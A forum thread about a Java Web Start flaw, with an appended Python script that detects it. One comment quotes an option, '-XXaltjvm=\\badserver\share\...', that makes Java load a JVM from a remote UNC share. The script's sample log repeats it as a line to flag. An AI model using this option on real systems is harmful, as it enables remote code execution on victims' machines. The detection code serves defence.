Client Side Java Flaw Affects Both Linux and Windows - Careful On Your Servers


  1. It appears that the flaw in the Java Web Start framework affects Linux machines just as much as Windows machines.
    The issue affects all versions since Java SE 6 update 10. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently.

    --------------
    Core Security Patterns: Best Practices and Strategies for J2EE ~ Ramesh Nagappan
    Java Security ~ Scott Oaks
  2. It appears that the flaw in the Java Web Start framework affects Linux machines just as much as Windows machines.

    The issue affects all versions since Java SE 6 update 10. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently.

    But you would have to somehow get a 'bad VM' on the target system in order to make this work. Since people (smart people anyway) don't surf the web from their server boxes, the hacker would have to have some way to get the poisoned VM on the server. And I guess I'm not clear how Java Web Start would be started on a server.
  3. Since people (smart people anyway) don't surf the web from their server boxes...

    Agreed. But sometimes smart people are lazy, especially around pre-prod and sandbox servers. Plus, who are we kidding - not every admin is smart. Point taken though.
  4. But you would have to somehow get a 'bad VM'...
    I've read somewhere else, ZDNet I think, that people are using UNC paths to download a bad VM on the fly, like this:

    -XXaltjvm=\\badserver\share\...

    This only works on Windows though, but there are Windows servers out there too :-)
  5. Thanks for answering that.  The other question I have is how is WebStart being invoked on servers?  We have such strict control over what can be deployed on our servers.  I can't imagine someone using Java WebStart to download Java to run on a server.  I might just be missing something about this.
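Two defender-side checks for the points raised in comments 1 and 4, as an added example that is not part of the thread: one parses a `java -version` string and flags the 6u10-and-later range the thread names (the patched release is not given here, so treat a hit as "vulnerable component present" and compare against the vendor advisory), the other scans process command lines for an `-XXaltjvm=` option whose value is a UNC path. The log lines are constructed samples in a generic "image + arguments" shape, not real telemetry.

```python
import re
from typing import List, Optional, Tuple

# The -XXaltjvm option from the thread, restricted to UNC values (\\host\share\...).
# Also catches the -J-XXaltjvm=... form that forwards the option to the launched JVM.
ALTJVM_UNC = re.compile(r'-XXaltjvm=(\\\\[^\\\s]+\\[^\s"]+)', re.IGNORECASE)

# Java 1.x version strings, e.g. 1.6.0_10 -> major 6, update 10.
JAVA_VERSION = re.compile(r'1\.(\d+)\.\d+(?:_(\d+))?')


def parse_java_version(version_output: str) -> Optional[Tuple[int, int]]:
    """Return (major, update) from `java -version` style output, or None."""
    m = JAVA_VERSION.search(version_output)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2) or 0)


def is_affected(version: Tuple[int, int]) -> bool:
    """True for Java SE 6 update 10 and later, the range the thread names.
    Assumption: the fixed release must be taken from the vendor advisory;
    this only says whether the affected component is present at all."""
    return version >= (6, 10)


def find_altjvm_unc(cmdline: str) -> Optional[str]:
    """Return the UNC path handed to -XXaltjvm, if the command line has one."""
    m = ALTJVM_UNC.search(cmdline)
    return m.group(1) if m else None


def scan_logs(lines: List[str]) -> List[int]:
    """Indexes of log lines whose command line loads a JVM from a UNC path."""
    return [i for i, line in enumerate(lines) if find_altjvm_unc(line)]


# Constructed sample command lines; a local -XXaltjvm path is benign and not flagged.
SAMPLE_LOGS = [
    r'javaws.exe -Xnosplash http://intranet.example/app.jnlp',
    r'javaws.exe -J-XXaltjvm=\\badserver\share\jvm http://web.example/x.jnlp',
    r'java.exe -XXaltjvm=C:\jre\bin\client -jar tool.jar',
]

if __name__ == "__main__":
    print("affected:", is_affected(parse_java_version('java version "1.6.0_10"')))
    print("suspicious log lines:", scan_logs(SAMPLE_LOGS))
```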